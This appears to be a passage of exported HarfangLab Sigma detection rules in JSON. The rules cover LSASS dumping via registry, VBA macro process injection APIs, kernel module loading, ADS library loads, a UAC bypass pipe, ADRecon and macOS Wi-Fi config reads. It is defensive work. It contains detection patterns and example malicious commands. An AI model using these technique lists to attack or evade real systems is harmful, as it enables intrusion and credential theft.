"rule_id": "b0120c9c-02c9-4ea2-bb67-0f50ff53427f",
"rule_name": "Suspicious Registry Modification Associated with LSASS Shtinkering",
"rule_description": "Detects a modification in the registry necessary for the LSASS Shtinkering dump method to work.\nLSASS Shtinkering is a LSASS dump technique that consists in sending a message to the Windows Error Reporting service to report an LSASS exception.\nThis, along with the correct dump type set in the registry, will dump the LSASS process memory.\nThis registry option might be enabled to aid Windows application developers with debugging.\nIt is recommended to investigate the process performing the registry modification to determine its legitimacy, a legitimate context could be the debugging of an application.\n",
"rule_creation_date": "2023-04-03",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b017a945-6dc9-439d-a646-cd49dd78ae40",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623863Z",
"creation_date": "2026-03-23T11:45:34.623865Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623883Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1059/005/",
"https://attack.mitre.org/techniques/T1106"
],
"name": "t1059_005_office_vba_macro_susp_native_api.yml",
"content": "title: Office VBA Macro Suspicious Native API Usage\nid: b017a945-6dc9-439d-a646-cd49dd78ae40\ndescription: |\n Detects suspicious native API usage in an Office VBA Macro.\n Threat actors can embed a macro that silently calls Windows's low level routines to carve out executable space inside a process, drop malicious code there, and then hand control to that code by spawning or hijacking a thread.\n By launching a secondary process and manipulating its execution context, they can inject the payload without touching the disk, gaining stealthy execution.\n It is recommended to investigate the TextPayload and the related Office document for suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1059/005/\n - https://attack.mitre.org/techniques/T1106\ndate: 2026/01/13\nmodified: 2026/03/19\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.005\n - attack.t1106\n - classification.Windows.Source.AmsiScan\n - classification.Windows.Behavior.Phishing\nlogsource:\n product: windows\n category: amsi_scan\ndetection:\n selection:\n AppName: 'OFFICE_VBA'\n ProcessProcessName:\n - 'Excel.exe'\n - 'WinWord.exe'\n TextPayload|contains:\n # Native API usage\n - 'GetProcAddress'\n - 'VirtualAlloc'\n - 'NtAllocateVirtualMemory'\n - 'CreateProcess?('\n - 'CreateProcess('\n - 'SetThreadContext'\n - 'NtSetContextThread'\n - 'CreateRemoteThread'\n - 'LoadLibrary'\n - 'NtProtectVirtualMemory'\n - 'VirtualProtect'\n - 'QueueUserApc'\n - 'WriteProcessMemory'\n - 'NtWriteVirtualMemory'\n\n exclusion_opensolver:\n ContentName|endswith: '\\OpenSolver.xlam'\n\n exclusion_xlwings:\n TextPayload|contains: 'KERNEL32.LoadLibraryA(*\\xlwings64*.dll)'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b017a945-6dc9-439d-a646-cd49dd78ae40",
"rule_name": "Office VBA Macro Suspicious Native API Usage",
"rule_description": "Detects suspicious native API usage in an Office VBA Macro.\nThreat actors can embed a macro that silently calls Windows's low level routines to carve out executable space inside a process, drop malicious code there, and then hand control to that code by spawning or hijacking a thread.\nBy launching a secondary process and manipulating its execution context, they can inject the payload without touching the disk, gaining stealthy execution.\nIt is recommended to investigate the TextPayload and the related Office document for suspicious activities.\n",
"rule_creation_date": "2026-01-13",
"rule_modified_date": "2026-03-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.005",
"attack.t1106"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b0391959-bd75-4da0-9f2c-a888f2fb3349",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.615481Z",
"creation_date": "2026-03-23T11:45:35.294594Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294600Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://linux.die.net/man/8/modprobe",
"https://man7.org/linux/man-pages/man8/kmod.8.html",
"https://attack.mitre.org/techniques/T1547/006/",
"https://attack.mitre.org/techniques/T1014/"
],
"name": "t1547_006_kernel_module_load_modprobe.yml",
"content": "title: Kernel Module Loaded via Modprobe\nid: b0391959-bd75-4da0-9f2c-a888f2fb3349\ndescription: |\n Detects the execution of modprobe to load a kernel module manually.\n Adversaries may modify the kernel to automatically execute programs on system boot.\n Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\n They extend the functionality of the kernel without the need to reboot the system.\n For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.\n It is recommended to analyze both the process calling modprobe and the loaded kernel module to look for malicious content or actions.\nreferences:\n - https://linux.die.net/man/8/modprobe\n - https://man7.org/linux/man-pages/man8/kmod.8.html\n - https://attack.mitre.org/techniques/T1547/006/\n - https://attack.mitre.org/techniques/T1014/\ndate: 2023/12/15\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1547.006\n - attack.defense_evasion\n - attack.t1014\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Rootkit.Generic\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.PrivilegeEscalation\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n # Commands seen in malware:\n # modprobe my_malicious_malware\n # modprobe -a malicious_1 malicious_2\n # modprobe -- /root/my_malicious_malware.ko\n selection:\n Image|endswith: '/kmod'\n CommandLine|contains: 'modprobe '\n\n # Ensure `modprobe` isn't called from a kworker thread (they have an empty image path)\n ParentImage|contains: '?'\n\n # modprobe --help\n exclusion_options_args:\n CommandLine|contains:\n - ' --help'\n - ' --version'\n - ' --dry-run'\n - ' --show'\n - ' --show-depends'\n - ' --showconfig'\n - ' --show-config'\n - ' --show-modversions'\n - ' --show-exports'\n - ' -n '\n\n exclusion_modules:\n CommandLine|contains:\n - ' nvidia'\n - ' nf_conntrack'\n - ' tun'\n - ' fuse'\n - ' evdi'\n - ' zfs'\n - ' aufs'\n - ' btrfs'\n - ' kvm_intel'\n - ' efivars'\n - ' vboxdrv'\n - ' overlay'\n - ' cpufreq_performance'\n - ' cpufreq_powersave'\n - ' cpufreq_conservative'\n - ' ipt_connmark'\n - ' net-pf-10'\n\n exclusion_iptables:\n ParentImage:\n - '/usr/bin/iptables'\n - '/usr/sbin/iptables'\n - '/usr/bin/xtables-multi'\n - '/usr/sbin/xtables-multi'\n - '/usr/bin/xtables-legacy-multi' # iptables using old getsockopt/setsockopt-based kernel api\n - '/usr/sbin/xtables-legacy-multi'\n - '/usr/sbin/ebtables'\n - '/usr/sbin/ebtables-legacy'\n - '/usr/sbin/ebtables-legacy-restore'\n\n exclusion_containers:\n ProcessAncestors|contains: '/usr/bin/containerd-shim'\n\n exclusion_systemd:\n ParentImage:\n - '/usr/lib/systemd/systemd'\n - '/nix/store/*-systemd-*/lib/systemd/systemd'\n\n exclusion_microk8s:\n - ParentImage: '/snap/microk8s/*/sbin/xtables-legacy-multi'\n - ParentCommandLine: '/bin/bash /snap/microk8s/*/run-kubelite-with-args'\n\n exclusion_containerd:\n ParentImage: '/usr/bin/containerd'\n\n exclusion_dockerd:\n - ParentImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/dockerd-ce'\n - ProcessAncestors|contains:\n - '|/usr/bin/dockerd|'\n - '|/var/lib/rancher/k3s/data/*/bin/containerd-shim-runc-v2|'\n - '|/usr/bin/docker-containerd-shim-current|'\n - '|/var/lib/rancher/*/bin/containerd-shim-runc-v2|'\n\n exclusion_os_prober:\n GrandparentCommandLine:\n - '/bin/sh /usr/bin/os-prober'\n - '/usr/bin/sh /bin/os-prober'\n\n exclusion_openvpn:\n - ParentImage: '/usr/lib/nm-openvpn-service'\n - GrandparentImage: '/usr/lib/NetworkManager/nm-openvpn-service'\n\n exclusion_veritas:\n GrandparentImage: '/opt/VRTSralus/bin/beremote'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_ipv6:\n CommandLine: 'modprobe ipv6'\n GrandparentCommandLine:\n - '/bin/bash /etc/rc.d/init.d/network start'\n - '/bin/bash /etc/sysconfig/network-scripts/ifup-eth ifcfg-*'\n\n exclusion_suspend:\n ParentCommandLine:\n - '/bin/bash /usr/lib/systemd/system-sleep/wifi-reset post suspend'\n - '/bin/bash /usr/lib/systemd/system-sleep/touchpad-reset post suspend'\n GrandparentCommandLine: '/lib/systemd/systemd-sleep suspend'\n\n exclusion_pacman:\n ProcessAncestors|contains: '|/usr/bin/pacman|'\n\n exclusion_dpkg:\n ProcessAncestors|contains: '|/usr/bin/dpkg|'\n\n exclusion_legitimate_parent:\n - ParentImage:\n # PLZ sandbox\n - '/tmp/plz_sandbox/'\n # Nagios\n - '/usr/sbin/nagios'\n # Podman\n - '/usr/bin/podman'\n # System utilities\n - '/usr/sbin/networkmanager'\n # Kube\n - '/usr/local/bin/kube-proxy'\n - '/var/lib/rancher/k3s/data/*/bin/k3s'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/usr/bin/rke2'\n - '/usr/local/bin/rke2'\n - '/opt/rancher/rke2/bin/rke2'\n - '/usr/bin/cilium-agent'\n - '/usr/bin/brltty'\n - '/usr/sbin/pktsetup'\n - '/usr/sbin/alsactl'\n - '/usr/lib/snapd/snapd'\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/microk8s/*/kubelite'\n - '/opt/sentinelone/bin/sentinelone-agent'\n - ParentCommandLine:\n # Intel\n - '/bin/sh /etc/kernel/preinst.d/intel-microcode *'\n - '/bin/sh /usr/share/initramfs-tools/hooks/intel_microcode'\n # VirtualBox\n - '/bin/sh /usr/lib/virtualbox/vboxdrv.sh *'\n - '/usr/bin/sh /usr/lib/virtualbox/vboxdrv.sh *'\n - '/bin/sh /etc/init.d/virtualbox *'\n - '/bin/sh /etc/init.d/virtualbox-guest-utils-hwe *'\n # Nagios\n - '/usr/local/nagios/plugins/check_ping'\n # Laptop detect\n - '/bin/sh -e /usr/bin/laptop-detect'\n - '/bin/sh -e /bin/laptop-detect'\n # McAfee\n - '/bin/bash /opt/mcafee/ens/esp/scripts//modversion-check.sh *'\n - '/bin/bash //opt/mcafee/ens/esp/scripts//modversion-check.sh *'\n # VMWare\n - '/etc/init.d/vmware start'\n - '/etc/init.d/vmware stop'\n - 'bash /etc/init.d/vmware start'\n - 'bash /etc/init.d/vmware stop'\n - '/bin/sh /etc/rc.d/init.d/vmware-tools start'\n - '/bin/sh /etc/rc.d/init.d/vmware-tools stop'\n # SCAP\n - 'bash /usr/bin/scap-driver-loader'\n # ALSA\n - '/bin/sh /usr/sbin/alsa force-reload'\n - 'sh -c -- /sbin/modprobe --ignore-install snd && { /sbin/modprobe --quiet --use-blacklist snd-*'\n - 'sh -c -- /sbin/modprobe --ignore-install snd-seq && { /sbin/modprobe --quiet --use-blacklist snd-*'\n - 'sh -c -- /sbin/modprobe --ignore-install snd-rawmidi && { /sbin/modprobe --quiet --use-blacklist snd-*'\n # System utilities\n - '/bin/bash /usr/bin/pf_ringctl start'\n - '/usr/lib/systemd/systemd-udevd'\n - '/bin/sh /usr/lib/os-probes/init/10filesystems'\n - '/bin/sh /usr/libexec/os-probes/init/10filesystems'\n - '/bin/bash /etc/network/iptables/iptables'\n # Veeam\n - '/usr/sbin/veeamworker --pidfile /var/run/veeamservice.pid --daemon'\n # Firewalld\n - '/usr/bin/python2 -es /usr/sbin/firewalld --nofork --nopid'\n - '/usr/libexec/platform-python -s /usr/sbin/firewalld --nofork --nopid'\n # Commvault\n - '/*/commvault/base*/cvlaunchd'\n # openipmi\n - '/bin/sh /etc/init.d/openipmi start'\n - '/bin/sh /etc/init.d/openipmi stop'\n # Veracrypt\n - '/usr/bin/veracrypt --core-service'\n # mkinitcpio\n - 'bash /usr/bin/mkinitcpio -k /boot/vmlinuz-linux -g /boot/initramfs-linux.img'\n # kdumpctl\n - '/bin/bash /usr/bin/kdumpctl start'\n # Gparted\n - '/usr/libexec/gpartedbin'\n # VPN\n - '*/sh /usr/libexec/ipsec/_stackmanager start'\n - '*/sh /etc/sysconfig/network-scripts/ifup-ipv6 *'\n # Fan\n - '/bin/sh - /usr/lib/ubuntu-fan/fan-net start'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b0391959-bd75-4da0-9f2c-a888f2fb3349",
"rule_name": "Kernel Module Loaded via Modprobe",
"rule_description": "Detects the execution of modprobe to load a kernel module manually.\nAdversaries may modify the kernel to automatically execute programs on system boot.\nLoadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\nThey extend the functionality of the kernel without the need to reboot the system.\nFor example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.\nIt is recommended to analyze both the process calling modprobe and the loaded kernel module to look for malicious content or actions.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1014",
"attack.t1547.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b050aae5-6064-4892-abde-50ff28111a90",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087041Z",
"creation_date": "2026-03-23T11:45:34.087043Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087048Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1564/004/"
],
"name": "t1546_004_library_loaded_from_ads.yml",
"content": "title: Library Loaded from ADS\nid: b050aae5-6064-4892-abde-50ff28111a90\ndescription: |\n Detects a library loaded from an Alternate Data Stream (ADS).\n Attackers may hide malicious payloads in a file's ADS to hide their actions and evade detection.\n It is recommended to investigate the actions performed by the process that loaded the library, as well as to analyze the load library for malicious content.\nreferences:\n - https://attack.mitre.org/techniques/T1564/004/\ndate: 2024/12/17\nmodified: 2025/10/02\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.004\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|startswith: '?:*:'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b050aae5-6064-4892-abde-50ff28111a90",
"rule_name": "Library Loaded from ADS",
"rule_description": "Detects a library loaded from an Alternate Data Stream (ADS).\nAttackers may hide malicious payloads in a file's ADS to hide their actions and evade detection.\nIt is recommended to investigate the actions performed by the process that loaded the library, as well as to analyze the load library for malicious content.\n",
"rule_creation_date": "2024-12-17",
"rule_modified_date": "2025-10-02",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1564.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b05508fb-568a-49c3-b7fe-be09a6b61772",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093226Z",
"creation_date": "2026-03-23T11:45:34.093228Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093232Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/antonioCoco/SspiUacBypass/",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_post_uac_bypass_sspi.yml",
"content": "title: UAC Bypass via Service Control Manager Named Pipe Executed\nid: b05508fb-568a-49c3-b7fe-be09a6b61772\ndescription: |\n Detects a connection to the ntsvcs named pipe using a specific pattern.\n Attackers might use this service-related named pipe to create a new service for UAC bypass.\n Attackers may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to investigate the process making the connection and any new services created on the machine.\nreferences:\n - https://github.com/antonioCoco/SspiUacBypass/\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2024/10/08\nmodified: 2025/01/13\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1548.002\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.UACBypass\nlogsource:\n product: windows\n category: named_pipe_connection\ndetection:\n selection:\n PipeName: '\\127.0.0.1\\pipe\\ntsvcs'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b05508fb-568a-49c3-b7fe-be09a6b61772",
"rule_name": "UAC Bypass via Service Control Manager Named Pipe Executed",
"rule_description": "Detects a connection to the ntsvcs named pipe using a specific pattern.\nAttackers might use this service-related named pipe to create a new service for UAC bypass.\nAttackers may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to investigate the process making the connection and any new services created on the machine.\n",
"rule_creation_date": "2024-10-08",
"rule_modified_date": "2025-01-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b055e773-e224-4c61-9498-88eb2239b128",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606425Z",
"creation_date": "2026-03-23T11:45:34.606428Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606436Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/",
"https://github.com/sense-of-security/ADRecon/",
"https://attack.mitre.org/techniques/T1069/",
"https://attack.mitre.org/techniques/T1018/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_adrecon_usage.yml",
"content": "title: ADRecon Execution\nid: b055e773-e224-4c61-9498-88eb2239b128\ndescription: |\n Detects the usage of ADRecon, a PowerShell tool designed to gather extensive information about an Active Directory environment.\n Adversaries may use this type of tool during the discovery phase to gather information about the Active Directory and corporate network.\n It is recommended to investigate the context around action to determine its legitimacy and to look for other suspicious actions on the host.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/\n - https://github.com/sense-of-security/ADRecon/\n - https://attack.mitre.org/techniques/T1069/\n - https://attack.mitre.org/techniques/T1018/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/05/04\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1069.001\n - attack.t1069.002\n - attack.t1018\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Tool.ADRecon\n - classification.Windows.Behavior.ActiveDirectory\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n - PowershellScriptPath|endswith: '\\ADRecon.ps1'\n - PowershellCommand|contains:\n - 'Function Get-ADRDomain'\n - 'Function Get-ADRForest'\n - 'Function Get-ADRTrust'\n - 'Function Get-ADRSite'\n - 'Function Get-ADRSubnet'\n - 'Function Get-ADRDefaultPasswordPolicy'\n - 'Function Get-ADRFineGrainedPasswordPolicy'\n - 'Function Get-ADRDomainController'\n - 'Function Get-ADRUser'\n - 'Function Get-ADRUserSPN'\n - 'Function Get-ADRPasswordAttributes'\n - 'Function Get-ADRGroup'\n - 'Function Get-ADRGroupMember'\n - 'Function Get-ADROU'\n - 'Function Get-ADRGPO'\n - 'Function Get-ADRGPLink'\n - 'Function Get-ADRDNSZone'\n - 'Function Get-ADRPrinter'\n - 'Function Get-ADRComputer'\n - 'Function Get-ADRComputerSPN'\n - 'Function Get-ADRLAPSCheck'\n - 'Function Get-ADRBitLocker'\n - 'Function Get-ADRACL'\n - 'Function Get-ADRGPOReport'\n - 'Function Get-ADRUserImpersonation'\n - 'Function Get-ADRRevertToSelf'\n - 'Function Get-ADRSPNTicket'\n - 'Function Get-ADRKerberoast'\n - 'Function Get-ADRDomainAccountsusedforServiceLogon'\n - 'Function Get-ADRAbout'\n - 'Function Invoke-ADRecon'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b055e773-e224-4c61-9498-88eb2239b128",
"rule_name": "ADRecon Execution",
"rule_description": "Detects the usage of ADRecon, a PowerShell tool designed to gather extensive information about an Active Directory environment.\nAdversaries may use this type of tool during the discovery phase to gather information about the Active Directory and corporate network.\nIt is recommended to investigate the context around action to determine its legitimacy and to look for other suspicious actions on the host.\n",
"rule_creation_date": "2022-05-04",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1018",
"attack.t1059.001",
"attack.t1069.001",
"attack.t1069.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b05fdca4-d28a-48e3-aeaa-0003e6db65f8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617846Z",
"creation_date": "2026-03-23T11:45:34.617849Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617853Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1016/002/"
],
"name": "t1016_002_read_airport_plist.yml",
"content": "title: Suspicious Read Access to Airport Preferences\nid: b05fdca4-d28a-48e3-aeaa-0003e6db65f8\ndescription: |\n Detects a process reading sensitive files related to the Wi-Fi configuration.\n Adversaries may read these files in order to gather information about the internet connection.\n It is recommended to verify if the process performing the read operation has legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1016/002/\ndate: 2024/07/03\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1016.002\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n Kind: 'read'\n Path: '/Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist'\n ProcessImage|contains: '?'\n\n filter_network_systemapp:\n ProcessImage:\n - '/System/Library/CoreServices/WiFiAgent.app/Contents/MacOS/WiFiAgent'\n - '/System/Library/CoreServices/ControlCenter.app/Contents/MacOS/ControlCenter'\n - 